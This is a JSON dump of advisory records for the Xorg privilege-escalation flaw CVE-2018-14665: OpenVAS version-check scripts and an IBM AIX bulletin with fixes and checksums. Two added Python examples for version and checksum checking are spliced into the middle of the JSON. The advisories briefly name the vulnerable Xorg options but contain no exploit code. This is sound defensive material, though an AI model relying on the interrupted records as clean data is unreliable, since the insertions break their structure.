value:\"http://lists.centos.org/pipermail/centos-announce/2018-December/023131.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server-common'\n package(s) announced via the CESA-2018:3410 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"X.Org is an open-source implementation of the X Window System. 
It provides\nthe basic low-level functionality that full-fledged graphical user\ninterfaces are designed upon.\n\nSecurity Fix(es):\n\n * xorg-x11-server: Incorrect permission check in Xorg X server allows for\nprivilege escalation (CVE-2018-14665)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.\n\nRed Hat would like to thank Narendra Shinde for reporting this issue.\");\n\n script_tag(name:\"affected\", value:\"xorg-x11-server-common on CentOS 7.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xwayland\", rpm:\"xorg-x11-server-Xwayland~1.20.1~5.1.el7\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-27T18:38:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1547", "CVE-2018-14665", "CVE-2018-20839"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220201062", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201062", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1062)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
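Every one of the OpenVAS scripts above reduces to one question per package: does the installed version sort below the fixed version quoted in the advisory? The block below is an added example, not part of this page or of the Greenbone plugins. It ports the two ordering algorithms those `isdpkgvuln`/`isrpmvuln` calls depend on (dpkg's `verrevcmp()` and rpm's `rpmvercmp()`) to Python so the comparison can be checked offline on a machine that has neither `dpkg` nor `rpm`. The fixed versions in `FIXED` are copied from the Debian, Ubuntu, CentOS and Fedora advisories on this page; the `SAMPLE` inventory, its host names and installed versions are constructed for the demo.

```python
import re
def _sign(n):
    return (n > 0) - (n < 0)
def _split_evr(v):
    """'[epoch:]version[-release]' -> (int epoch, version, release); absent parts default to 0 and ''."""
    epoch, _, rest = v.partition(":") if ":" in v else ("0", "", v)
    version, _, release = rest.rpartition("-") if "-" in rest else (rest, "", "")
    return int(epoch), version, release

# ---- dpkg (Debian/Ubuntu): port of verrevcmp() from dpkg's lib/dpkg/vercmp.c ----
def _dpkg_order(c):
    """Character weight: digits 0, letters ord(c), '~' -1 (sorts before even end of string), other symbols ord(c)+256."""
    return 0 if c.isdigit() else ord(c) if c.isalpha() else -1 if c == "~" else ord(c) + 256

def _dpkg_verrevcmp(a, b):
    """Compare an upstream-version or revision fragment by alternating non-digit and digit runs."""
    while a or b:
        while (a and not a[0].isdigit()) or (b and not b[0].isdigit()):
            ac, bc = (_dpkg_order(a[0]) if a else 0), (_dpkg_order(b[0]) if b else 0)
            if ac != bc:
                return _sign(ac - bc)
            a, b = a[1:], b[1:]
        a, b, first_diff = a.lstrip("0"), b.lstrip("0"), 0   # leading zeros of a digit run are insignificant
        while a and a[0].isdigit() and b and b[0].isdigit():
            first_diff = first_diff or _sign(ord(a[0]) - ord(b[0]))
            a, b = a[1:], b[1:]
        if a and a[0].isdigit():          # the longer digit run wins ...
            return 1
        if b and b[0].isdigit():
            return -1
        if first_diff:                    # ... otherwise the first differing digit decides
            return first_diff
    return 0

def dpkg_cmp(v1, v2):
    """Same ordering as `dpkg --compare-versions`; returns -1, 0 or 1."""
    e1, u1, r1 = _split_evr(v1)
    e2, u2, r2 = _split_evr(v2)
    return _sign(e1 - e2) or _dpkg_verrevcmp(u1, u2) or _dpkg_verrevcmp(r1, r2)

# ---- rpm (Fedora/CentOS/EulerOS): port of rpmvercmp() from rpm's lib/rpmvercmp.c ----
def rpmvercmp(a, b):
    """Compare one version or release string segment by segment; '~' marks a pre-release, '^' a post-release."""
    if a == b:
        return 0
    while a or b:
        a, b = re.sub(r"^[^0-9A-Za-z~^]+", "", a), re.sub(r"^[^0-9A-Za-z~^]+", "", b)  # separators are ignored
        if "~" in (a[:1], b[:1]):         # tilde sorts before everything, including end of string
            if a[:1] != b[:1]:
                return -1 if a[:1] == "~" else 1
            a, b = a[1:], b[1:]
            continue
        if "^" in (a[:1], b[:1]):         # caret: a bare base version is older than its ^-suffixed form
            if not a or not b:
                return -1 if not a else 1
            if a[:1] != b[:1]:
                return 1 if a[:1] != "^" else -1
            a, b = a[1:], b[1:]
            continue
        if not (a and b):
            break
        isnum = a[0].isdigit()
        pat = r"[0-9]+" if isnum else r"[A-Za-z]+"
        seg1, m2 = re.match(pat, a).group(0), re.match(pat, b)
        if m2 is None:                    # numeric segment against alpha segment: numeric is newer
            return 1 if isnum else -1
        seg2 = m2.group(0)
        s1, s2 = (seg1.lstrip("0"), seg2.lstrip("0")) if isnum else (seg1, seg2)
        if isnum and len(s1) != len(s2):  # more digits wins, so 10 > 9
            return _sign(len(s1) - len(s2))
        if s1 != s2:
            return -1 if s1 < s2 else 1
        a, b = a[len(seg1):], b[len(seg2):]
    if not a and not b:
        return 0
    return -1 if not a else 1             # whichever side still has characters left is newer

def rpm_cmp(v1, v2):
    """rpm EVR ordering ([epoch:]version-release); returns -1, 0 or 1."""
    e1, n1, r1 = _split_evr(v1)
    e2, n2, r2 = _split_evr(v2)
    return _sign(e1 - e2) or rpmvercmp(n1, n2) or rpmvercmp(r1, r2)

# Fixed versions quoted in the advisories above (one package per release; a real check walks all of them).
FIXED = {
    "DEB9":        ("xserver-xorg-core",    "2:1.19.2-1+deb9u4",   dpkg_cmp),  # DSA-4328-1
    "UBUNTU18.04": ("xserver-xorg-core",    "2:1.19.6-1ubuntu4.2", dpkg_cmp),  # USN-3802-1
    "CentOS7":     ("xorg-x11-server-Xorg", "1.20.1-5.1.el7",      rpm_cmp),   # CESA-2018:3410
    "FC28":        ("xorg-x11-server",      "1.19.6-10.fc28",      rpm_cmp),   # FEDORA-2018-839720583a
}
def is_vulnerable(release, installed):
    """True when the installed version sorts below the fixed one for that release."""
    _pkg, fixed, cmp = FIXED[release]
    return cmp(installed, fixed) < 0

# Constructed inventory for the demo (host, release, installed version); not real hosts.
SAMPLE = [("web01", "DEB9", "2:1.19.2-1+deb9u3"), ("web02", "UBUNTU18.04", "2:1.19.6-1ubuntu4.2"),
          ("db01", "CentOS7", "1.19.5-5.el7"), ("dev01", "FC28", "1.19.6-10.fc28")]
def scan(inventory=SAMPLE):
    return [(host, rel, ver, is_vulnerable(rel, ver)) for host, rel, ver in inventory]

if __name__ == "__main__":
    for host, rel, ver, vuln in scan():
        print(f"{host:6} {rel:12} {ver:22} {'VULNERABLE' if vuln else 'ok'}")
```

Run as a script it prints one line per host. Two rules are what a naive string or float comparison gets wrong: a `~` sorts before the end of the string in both families (so `1.20~rc1` is older than `1.20`), and a digit run wins on length once leading zeros are dropped (so `1.10` is newer than `1.9`); release strings like the EulerOS `4.h4.eulerosv2r8` above are why rpm walks alpha and numeric segments alternately rather than parsing numbers. A version below the fix is only exploitable where Xorg actually runs with elevated privileges (Ubuntu's text says "running as root with the legacy wrapper"; SUSE notes its default installation does not), so pair the version check with a look at the binary's mode on the host.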
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1062\");\n script_version(\"2020-01-23T13:18:37+0000\");\n script_cve_id(\"CVE-2018-14665\", \"CVE-2018-20839\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 13:18:37 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 13:18:37 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for xorg-x11-server (EulerOS-SA-2020-1062)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.5\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1062\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1062\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'xorg-x11-server' package(s) announced via the EulerOS-SA-2020-1062 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code 
under root privileges.(CVE-2018-14665)\n\nsystemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.(CVE-2018-20839)(CVE-2019-1547)\");\n\n script_tag(name:\"affected\", value:\"'xorg-x11-server' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.5.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.5.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.20.1~4.h4.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.5.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.20.1~4.h4.eulerosv2r8\", rls:\"EULEROSVIRTARM64-3.0.5.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2020-04-22T00:52:05", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Dec 11 09:32:52 CST 2018\n|Updated: Tue Apr 9 09:52:17 CDT 2019\n|Update: Added AIX 7100-04-07 and 7200-02-03 as affected.\n| Added iFixes for AIX 7100-04-07 and 7200-02-03.\n\nThe most recent version of this document is available 
here:\nhttp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\nhttps://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\nftp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\n\nSecurity Bulletin: Vulnerability in Xorg affects AIX (CVE-2018-14665)\n\n===============================================================================\n\nSUMMARY:\n\n There is a vulnerability in Xorg that affects AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2018-14665\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\n DESCRIPTION: X.Org X server could allow a remote authenticated attacker \n to gain elevated privileges on the system, caused by improper \n validation of command line parameters. An attacker could exploit this \n vulnerability using the -modulepath argument or the -logfile argument \n to overwrite arbitrary files and execute unprivileged code on the \n system.\n CVSS Base Score: 8.8\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/151991\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The following fileset levels are vulnerable:\n \n key_fileset = aix\n\n Fileset Lower Level Upper Level KEY \n ---------------------------------------------------------\n X11.base.rte 6.1.9.0 6.1.9.100 key_w_fs\n| X11.base.rte 7.1.4.0 7.1.4.31 key_w_fs\n X11.base.rte 7.1.5.0 7.1.5.31 key_w_fs\n X11.base.rte 7.2.0.0 7.2.0.1 key_w_fs\n X11.base.rte 7.2.1.0 7.2.1.0 key_w_fs\n| X11.base.rte 7.2.2.0 7.2.2.16 key_w_fs\n X11.base.rte 7.2.3.0 7.2.3.15 key_w_fs\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep 
-i X11.base.rte\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ------------------------------------------------\n 6.1.9 IJ11000 ** N/A key_w_apar\n 7.1.4 IJ11544 ** SP08 key_w_apar\n 7.1.5 IJ11544 ** N/A key_w_apar\n 7.1.5 IJ11545 ** SP04 key_w_apar\n 7.2.0 IJ11546 ** N/A key_w_apar\n 7.2.1 IJ11547 ** SP06 key_w_apar\n 7.2.2 IJ11549 ** SP04 key_w_apar\n 7.2.3 IJ11550 ** SP03 key_w_apar\n\n VIOS Level APAR Availability SP KEY\n ----------------------------------------------------\n 2.2.4 IJ11000 ** N/A key_w_apar\n 2.2.5 IJ11000 ** 2.2.5.60 key_w_apar\n 2.2.6 IJ11000 ** 2.2.6.40 key_w_apar\n 3.1.0 IJ11550 ** 3.1.0.20 key_w_apar\n\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11000\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11544\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11545\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11546\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11547\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11549\n http://www.ibm.com/support/docview.wss?uid=isg1IJ11550\n\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11000\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11544\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11545\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11546\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11547\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11549\n https://www.ibm.com/support/docview.wss?uid=isg1IJ11550\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. 
FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX and VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar\n http://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar\n https://aix.software.ibm.com/aix/efixes/security/xorg_fix3.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ----------------------------------------------\n 6.1.9.x IJ11000s0b.181127.epkg.Z key_w_fix\n 7.1.4.4 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.4.5 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.4.6 IJ11544s0a.181127.epkg.Z key_w_fix\n| 7.1.4.7 IJ11544s0a.190312.epkg.Z key_w_fix\n 7.1.5.0 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.1 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.2 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.3 IJ11544s0a.181127.epkg.Z key_w_fix\n 7.1.5.3 IJ11545s0a.181127.epkg.Z key_w_fix\n 7.2.0.x IJ11546s0a.181127.epkg.Z key_w_fix\n 7.2.1.x IJ11547s0a.181127.epkg.Z key_w_fix\n 7.2.2.x IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.0 IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.1 IJ11549s0a.181127.epkg.Z key_w_fix\n 7.2.2.2 IJ11549s0a.181127.epkg.Z key_w_fix\n| 7.2.2.3 IJ11549s0a.190312.epkg.Z key_w_fix\n 7.2.3.x IJ11550s0a.181127.epkg.Z key_w_fix\n\n Please reference the Affected Products and Version section above\n for help with checking installed fileset levels.\n\n NOTE: Multiple iFixes are provided for AIX 7100-05-03.\n IJ11544s0a is for AIX 7100-05-03 with X11.base.rte fileset level 7.1.4.30.\n IJ11545s0a is for AIX 7100-05-03 with X11.base.rte fileset level 7.1.5.31.\n\n VIOS Level Interim Fix (*.Z) KEY\n -----------------------------------------------\n 2.2.x IJ11000s0b.181127.epkg.Z key_w_fix\n 3.1.x IJ11550s0a.181127.epkg.Z key_w_fix\n\n To extract the fixes 
from the tar file:\n\n tar xvf xorg_fix3.tar\n cd xorg_fix3\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 [filename]\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 81a407e154ab90e003135bf075f171b127d811e3a9177cb866d589ff2459ef19 IJ11000s0b.181127.epkg.Z key_w_csum\n 458f8391ceabeedf418f54595ce9ef87d63a667369dc4a3112b8548bff80fb6d IJ11544s0a.181127.epkg.Z key_w_csum\n| 2b719e0b4d8bdcb89f97ffe1ecceccfbf0538cb2cdec66b8214eeae7c7b37958 IJ11544s0a.190312.epkg.Z key_w_csum\n 041e1271b858211365025a4528c71f453c72405a1f0809128e0c70d49886a166 IJ11545s0a.181127.epkg.Z key_w_csum\n 1f4f7a7ef34c7804464ccdc02f1a253ac373a9c66ee3144350b390509976cfad IJ11546s0a.181127.epkg.Z key_w_csum\n 8aac56821f52600ee3158efa39e0bf697813712364b946c199fbb32dd1da9ce6 IJ11547s0a.181127.epkg.Z key_w_csum\n 7518d581224e6b4332b4cfab48253a7427fb0e3ab866567766b2d137bc0e9267 IJ11549s0a.181127.epkg.Z key_w_csum\n| 0eea9877dcaf6ffbd6c0d7572fd7ceb6437ef1f0b2f3134a22afc47260e9e7c5 IJ11549s0a.190312.epkg.Z key_w_csum\n f18e4f2efd4f488e7a02de90bfa6992b604298dba1d588689d4e58e71b3738db IJ11550s0a.181127.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. 
\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. Verify it is both bootable and readable before\n proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n 
http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerability in Xorg affects AIX (CVE-2018-14665)\n https://www-01.ibm.com/support/docview.wss?uid=ibm10742279\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Dec 11 09:32:52 CST 2018\n Updated: Mon Dec 17 08:33:34 CST 2018\n Update: Corrected the iFixes listed for AIX 7100-05.\n| Updated: Tue Apr 9 09:52:17 CDT 2019\n| Update: Added AIX 7100-04-07 and 7200-02-03 as affected.\n| Added iFixes for AIX 7100-04-07 and 7200-02-03.\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. 
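The bulletin's own procedure is `lslpp -L | grep -i X11.base.rte` to read the fileset level, a comparison against the Lower Level / Upper Level table, and `openssl dgst -sha256` on each downloaded ifix against the published sums. The block below is an added example, not IBM's tooling, that performs the same two checks in Python: it pulls the Level column for one fileset out of `lslpp -L` output (the sample output is constructed), tests it against the bulletin's ranges numerically, and compares a package's SHA-256 with the published value. Only two of the bulletin's sums are copied into `PUBLISHED_SHA256`; the range table is copied in full.

```python
import hashlib
import os
import re

# Vulnerable X11.base.rte ranges copied from the bulletin's Lower Level / Upper Level table (inclusive).
VULNERABLE_RANGES = [
    ("6.1.9.0", "6.1.9.100"), ("7.1.4.0", "7.1.4.31"), ("7.1.5.0", "7.1.5.31"), ("7.2.0.0", "7.2.0.1"),
    ("7.2.1.0", "7.2.1.0"), ("7.2.2.0", "7.2.2.16"), ("7.2.3.0", "7.2.3.15"),
]

# Two of the sums from the bulletin's "openssl dgst -sha256" table; add the others the same way.
PUBLISHED_SHA256 = {
    "IJ11000s0b.181127.epkg.Z": "81a407e154ab90e003135bf075f171b127d811e3a9177cb866d589ff2459ef19",
    "IJ11550s0a.181127.epkg.Z": "f18e4f2efd4f488e7a02de90bfa6992b604298dba1d588689d4e58e71b3738db",
}

def vrmf(level):
    """'7.1.5.31' -> (7, 1, 5, 31). Levels compare field by field; as strings '7.1.5.31' < '7.1.5.4'."""
    return tuple(int(x) for x in level.split("."))

def level_is_vulnerable(level):
    """True when the fileset level falls inside one of the bulletin's ranges."""
    v = vrmf(level)
    return any(vrmf(lo) <= v <= vrmf(hi) for lo, hi in VULNERABLE_RANGES)

def installed_level(lslpp_output, fileset="X11.base.rte"):
    """Extract the Level column for one fileset from `lslpp -L` output; None if it is not installed."""
    for line in lslpp_output.splitlines():
        m = re.match(r"\s*(\S+)\s+(\d+(?:\.\d+){3})\s", line)
        if m and m.group(1) == fileset:
            return m.group(2)
    return None

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def ifix_matches(name, data):
    """Same test as `openssl dgst -sha256 <ifix>` compared against the bulletin's table."""
    expected = PUBLISHED_SHA256.get(name)
    return expected is not None and sha256_hex(data) == expected

def ifix_file_matches(path):
    with open(path, "rb") as f:
        return ifix_matches(os.path.basename(path), f.read())

# Constructed `lslpp -L` excerpt for the demo; a real run is `lslpp -L | grep -i X11.base.rte`.
SAMPLE_LSLPP = """\
  Fileset                      Level  State  Type  Description (Uninstaller)
  ----------------------------------------------------------------------------
  X11.base.lib               7.1.5.30    C     F    AIXwindows Runtime Libraries
  X11.base.rte               7.1.5.31    C     F    AIXwindows Runtime Environment
"""

if __name__ == "__main__":
    lvl = installed_level(SAMPLE_LSLPP)
    state = "VULNERABLE, apply the ifix" if lvl and level_is_vulnerable(lvl) else "not in a listed range"
    print(f"X11.base.rte {lvl}: {state}")
```

The published sums travel over the same http/ftp channel as the packages, so a matching sum rules out a truncated or corrupted download, not a substituted one; the OpenSSL signature check listed in section B of the bulletin is the control for that.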
\n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n", "edition": 13, "modified": "2019-04-09T09:52:17", "published": "2018-12-11T09:32:52", "id": "XORG_ADVISORY3.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc", "title": "There is a vulnerability in Xorg that affects AIX.,There is a vulnerability in Xorg that affects VIOS.", "type": "aix", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14665"], "description": "X.Org is an open-source implementation of the X Window System. 
